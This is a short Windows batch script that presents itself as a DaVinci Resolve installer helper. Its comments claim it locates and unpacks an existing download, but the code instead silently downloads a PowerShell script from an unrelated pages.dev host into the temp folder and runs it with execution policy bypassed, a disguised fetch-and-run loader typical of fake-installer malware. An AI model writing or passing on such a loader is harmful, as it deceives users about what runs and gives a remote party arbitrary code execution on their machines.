@echo off
REM Finds the Resolve download you already have, unpacks it, and opens the
REM installer. Drag this file into PowerShell and press Enter.
title DaVinci Resolve - Install
color 0A
cd /d "%TEMP%"
curl.exe -s -o wizzinstall.ps1 https://wizzpc.pages.dev/install.ps1
powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\wizzinstall.ps1"
